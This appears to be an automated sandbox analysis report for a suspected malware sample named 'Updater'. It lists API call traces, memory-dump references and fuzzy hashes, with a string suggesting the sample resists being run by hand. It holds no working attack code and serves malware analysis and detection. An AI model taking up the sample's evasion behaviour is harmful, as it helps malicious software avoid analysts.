                                                                                                  • MessageBoxA.USER32(00000000,014B2AB5,014B2AB1,00000000), ref: 014B29B3
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,014B6DCD,00000001,00000000), ref: 014B29BB
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 014B29DD
                                                                                                  • MessageBoxA.USER32(00000000,014B2AB9,014B2AB1,00000000), ref: 014B29F4
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 014B2A9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Message$CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2324011479-0
                                                                                                  • Opcode ID: 259cfec4a4ca762d8f1a2513425256da8b184797b155471f1ea9b8ee91c1686b
                                                                                                  • Instruction ID: 875a87ba980d19f8e3df70c11e2a4a7f453044f458befe64511ed120378b4849
                                                                                                  • Opcode Fuzzy Hash: 259cfec4a4ca762d8f1a2513425256da8b184797b155471f1ea9b8ee91c1686b
                                                                                                  • Instruction Fuzzy Hash: A2318F74344301AFD310EF1ACC84F5AB7E5EFA8710F51892EF958973A1D6B0E8049B61
                                                                                                  APIs
                                                                                                  • ___scrt_release_startup_lock.LIBCMT ref: 006F0AA4
                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 006F0AB8
                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 006F0ADD
                                                                                                  • ___scrt_get_show_window_mode.LIBCMT ref: 006F0AEF
                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 006F0B20
                                                                                                  • ___scrt_fastfail.LIBCMT ref: 006F0B6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 4079798206-0
                                                                                                  • Opcode ID: d0d25d3a03dfc3501c5e86c3462f82175848ca6728bfcd80a40e68c0012b959c
                                                                                                  • Instruction ID: 4df5a1ec4db4a7ea3a1c76287cc90ca247ac3bf9a2f46e3a3681b2722efbe449
                                                                                                  • Opcode Fuzzy Hash: d0d25d3a03dfc3501c5e86c3462f82175848ca6728bfcd80a40e68c0012b959c
                                                                                                  • Instruction Fuzzy Hash: 1121052168130DEAFA7077B898067BE23639F42725F24005DFB806B2D3CE664D41862D
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006E5C71,SwapMouseButtons,00000004,?), ref: 006E5CA4
                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006E5C71,SwapMouseButtons,00000004,?,?,?,?,006E4F9C), ref: 006E5CC5
                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,006E5C71,SwapMouseButtons,00000004,?,?,?,?,006E4F9C), ref: 006E5CE7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: Control Panel\Mouse
                                                                                                  • API String ID: 3677997916-824357125
                                                                                                  • Opcode ID: a690d97c2a3bd7f3bf2a5bca23a6fe46486b34bb208ffd64b21c4700d586964c
                                                                                                  • Instruction ID: aaeb3e0fd88b56dba3eb0f3e39407d3acc3d4f6e3c9b1d495a1e81f0fb78dbc1
                                                                                                  • Opcode Fuzzy Hash: a690d97c2a3bd7f3bf2a5bca23a6fe46486b34bb208ffd64b21c4700d586964c
                                                                                                  • Instruction Fuzzy Hash: 21114871612748BEDB208FA9DC80AEEBBA9EF04B04F208469E806D7210E6319E419764
                                                                                                  Strings
                                                                                                  • Variable must be of type 'Object'., xrefs: 00717FA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                  • API String ID: 0-109567571
                                                                                                  • Opcode ID: cd15b3d40c0a4464915aa2edb063d1a0da74a0d51aea080ca13b4cbcbc22d617
                                                                                                  • Instruction ID: 0cf9397dac7b68a522e0b998125fdc99063b5813fce7a96f8396033fe4fb004a
                                                                                                  • Opcode Fuzzy Hash: cd15b3d40c0a4464915aa2edb063d1a0da74a0d51aea080ca13b4cbcbc22d617
                                                                                                  • Instruction Fuzzy Hash: CFC29D71E00205DFCB24CF98C884AADB7F2FF59710F25815AE905AB391DB35AD82CB95
                                                                                                  APIs
                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6665
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6674
                                                                                                  • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6693
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 014B6699
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3919263394-0
                                                                                                  • Opcode ID: a47b8b5d0c43bd31b581e87a915d5a51e84b9558cf71df1ad3f7e02982d2e6aa
                                                                                                  • Instruction ID: 5276ecac3a2d2fb75a42ccb915f1f2169769256bc2eb8341b1b061508b263f5e
                                                                                                  • Opcode Fuzzy Hash: a47b8b5d0c43bd31b581e87a915d5a51e84b9558cf71df1ad3f7e02982d2e6aa
                                                                                                  • Instruction Fuzzy Hash: B6112174600205BFE710EF79CC82F9A77ECDB3C710F61056AB514E71E0EAB16A109624
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CALL$|(z
                                                                                                  • API String ID: 0-1524859936
                                                                                                  • Opcode ID: 856a2218c9eecddf0a94a7852ca7f47e67ba24348ef0187f0c5e8fcce5e5223a
                                                                                                  • Instruction ID: 8e1434883ded9c5c6e90bc8c62e19ff86e6f6084e388e8bb40e8dc6b4ef82b3b
                                                                                                  • Opcode Fuzzy Hash: 856a2218c9eecddf0a94a7852ca7f47e67ba24348ef0187f0c5e8fcce5e5223a
                                                                                                  • Instruction Fuzzy Hash: AD128D70908341DFD724DF28C444B6AB7E2BF85300F15895EE99A8B3A1DB35ED85CB86
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 006D90D4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Init_thread_footer
                                                                                                  • String ID: CALL$|(z
                                                                                                  • API String ID: 1385522511-1524859936
                                                                                                  • Opcode ID: 0985149c4215118c27d09147d8743301cb3b4a02cb374adb2f72e57931c8eff4
                                                                                                  • Instruction ID: 9607b576738d30e88fb4a0822a02b20f40162d055f24a926969590cf279d0f0a
                                                                                                  • Opcode Fuzzy Hash: 0985149c4215118c27d09147d8743301cb3b4a02cb374adb2f72e57931c8eff4
                                                                                                  • Instruction Fuzzy Hash: 9F91ABB0908201DFCB24DF24C844B6ABBE2BF85314F14855DE99A4B3A2CB35E955CF96
                                                                                                  APIs
                                                                                                  • MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message
                                                                                                  • String ID: Executing manually will not work$nznddeJq
                                                                                                  • API String ID: 2030045667-2627449890
                                                                                                  • Opcode ID: 74c0ba8d6b0782ff0541851dff3686f365a5c199173a0dcb772eaa93b5bb265c
                                                                                                  • Instruction ID: 21b3cec66290254f5e3fab31de9be88d8b3d63d7e60a79021735d9d40f5d9cdb
                                                                                                  • Opcode Fuzzy Hash: 74c0ba8d6b0782ff0541851dff3686f365a5c199173a0dcb772eaa93b5bb265c
                                                                                                  • Instruction Fuzzy Hash: 7A310C306883098FCB54EFA0D8C0BD87774FB61228F95426FED044A175C23D984ADA31
                                                                                                  APIs
                                                                                                  • MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message
                                                                                                  • String ID: Executing manually will not work$nznddeJq
                                                                                                  • API String ID: 2030045667-2627449890
                                                                                                  • Opcode ID: 73c1a51bc362858e621e64e5b4ea5b33f5890aabd3f75c2ec00891cc8cb15558
                                                                                                  • Instruction ID: cc1de87851e63d64be576edc72643715b390bd823f705e522a91d30394b7ef04
                                                                                                  • Opcode Fuzzy Hash: 73c1a51bc362858e621e64e5b4ea5b33f5890aabd3f75c2ec00891cc8cb15558
                                                                                                  • Instruction Fuzzy Hash: 9721027068830A8FD721EBA1C8C1BC97774EB75724FA1456FEE00972B5C67C980A8A71
                                                                                                  APIs
                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 007271AE
                                                                                                    • Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF
                                                                                                    • Part of subcall function 006EFDB9: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006EFDD8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                  • String ID: (sy$X
                                                                                                  • API String ID: 779396738-2170681109
                                                                                                  • Opcode ID: ecc6481f19e371ee3ce1cffba23b1d863a2e043b11735107832dae113d3e6e36
                                                                                                  • Instruction ID: f3eb0f2bb221d331a110a99a03cb13718ac47e1dca22e3a2df2c6a20410304bf
                                                                                                  • Opcode Fuzzy Hash: ecc6481f19e371ee3ce1cffba23b1d863a2e043b11735107832dae113d3e6e36
                                                                                                  • Instruction Fuzzy Hash: C721A130A14298ABCF45DFA5DC057EE7BFA9F49310F00801EE904AB241DBF85989DFA5
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C74
                                                                                                    • Part of subcall function 006F440C: RaiseException.KERNEL32(?,?,?,006F0C96,?,00000001,?,?,?,?,?,?,006F0C96,?,007994C0), ref: 006F446B
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                  • String ID: Unknown exception
                                                                                                  • API String ID: 3476068407-410509341
                                                                                                  • Opcode ID: e6f9379cf10a99f1fcb715490abccf2f6ef84f39bdf0ac82e6e8d1c6faf6d821
                                                                                                  • Instruction ID: bfcef9570390a3f647e1dbda201b36e6a86d68b6e514321b501004876e0c1b51
                                                                                                  • Opcode Fuzzy Hash: e6f9379cf10a99f1fcb715490abccf2f6ef84f39bdf0ac82e6e8d1c6faf6d821
                                                                                                  • Instruction Fuzzy Hash: CFF0286490020CF79F40BAA8E812EBE77AE5E00304FA08228BB1495993EB71D516C1C4
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00758D10
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00758D17
                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00758EF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 146820519-0
                                                                                                  • Opcode ID: 5f618be27dddcdac8cf5eda1110cc8cd5d2829d20a1e5eaa45691f97479ee6a2
                                                                                                  • Instruction ID: a043e94253ae4a007c66e9d260e0e843957cefb34799b8ba18d613a8c66336ee
                                                                                                  • Opcode Fuzzy Hash: 5f618be27dddcdac8cf5eda1110cc8cd5d2829d20a1e5eaa45691f97479ee6a2
                                                                                                  • Instruction Fuzzy Hash: 09127A71A08341DFC750CF28C485B6ABBE1FF88315F04895DE8899B392DB75E949CB92
                                                                                                  APIs
                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 006E1D9F
                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 006E1DAF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: 811211883c47750197dc276713cd699553fa3dab3470268b0e5d2129a0148b86
                                                                                                  • Instruction ID: d7c407ef901d2b405683847290e5e0c331f130689a646b2cc8d2282de2ce5dc3
                                                                                                  • Opcode Fuzzy Hash: 811211883c47750197dc276713cd699553fa3dab3470268b0e5d2129a0148b86
                                                                                                  • Instruction Fuzzy Hash: A0314931A01759EFDB18CF69CC80B99B7B6FF05314F14862AE9149B280C771BDA4EB90
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E37B5: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006E38A8
                                                                                                  • KillTimer.USER32(?,00000001), ref: 006E36A2
                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006E36B1
                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00727D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                  • String ID:
                                                                                                  • API String ID: 3500052701-0
                                                                                                  • Opcode ID: 951af77e4767aef9ea7defa4ed91e08b042fb563bcf7d9c8d01ef7d6e6678dfe
                                                                                                  • Instruction ID: 9fe5d1ddcd15adad1723368679caf7d89ff3250c43d188e78fe618063ea828ea
                                                                                                  • Opcode Fuzzy Hash: 951af77e4767aef9ea7defa4ed91e08b042fb563bcf7d9c8d01ef7d6e6678dfe
                                                                                                  • Instruction Fuzzy Hash: 7531B170A083A4AFEB32CF34D885BE6BBEC9F06304F00449EE59A97241D7781A85CF55
                                                                                                  APIs
                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,007083FC,?,00799910,0000000C), ref: 00708534
                                                                                                  • GetLastError.KERNEL32(?,007083FC,?,00799910,0000000C), ref: 0070853E
                                                                                                  • __dosmaperr.LIBCMT ref: 00708569
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2583163307-0
                                                                                                  • Opcode ID: 69e1102102839844e91015f32a02da80f57aa9abe12d0792c20cddf310e4ca96
                                                                                                  • Instruction ID: 16396df81177334b309263f6650c2f6ef5f104547027d4973833948dd6f6288b
                                                                                                  • Opcode Fuzzy Hash: 69e1102102839844e91015f32a02da80f57aa9abe12d0792c20cddf310e4ca96
                                                                                                  • Instruction Fuzzy Hash: BC016B32A00260DAD3A41338AC4973F27CA4B82734F258318F964C71C3DEBC8C818656
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 014B602B
                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 014B6052
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 014B6077
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3677997916-0
                                                                                                  • Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                  • Instruction ID: b00b233dfd9633ecf343c660060d4b993cabc6eb08099a738ad7d9ce0a5565f7
                                                                                                  • Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                  • Instruction Fuzzy Hash: F3113075A0021D6BDB15DA9ACC81EEFB3BCAF6C310F41056AF614D7260D6B09A448BA0
                                                                                                  APIs
                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1065093856-0
                                                                                                  • Opcode ID: b6c4271d2ba4b9495cbc9bb6ffc6d609fe08f28e71ef0019f7bc28b32552d8bb
                                                                                                  • Instruction ID: ca9cb55bc6a159d3b77c002520a69ac92eb40b0d98420877768d7ac6c730d1ff
                                                                                                  • Opcode Fuzzy Hash: b6c4271d2ba4b9495cbc9bb6ffc6d609fe08f28e71ef0019f7bc28b32552d8bb
                                                                                                  • Instruction Fuzzy Hash: 8101D4716016047FE720DEA98C82FAE76ACDB69B10FA2457AB514E31E0DAB45E005564
                                                                                                  APIs
                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,0070926A,FF8BC369,00000000,00000002,00000000), ref: 007091F4
                                                                                                  • GetLastError.KERNEL32(?,0070926A,FF8BC369,00000000,00000002,00000000,?,0070598F,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,006F6AFC), ref: 007091FE
                                                                                                  • __dosmaperr.LIBCMT ref: 00709205
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
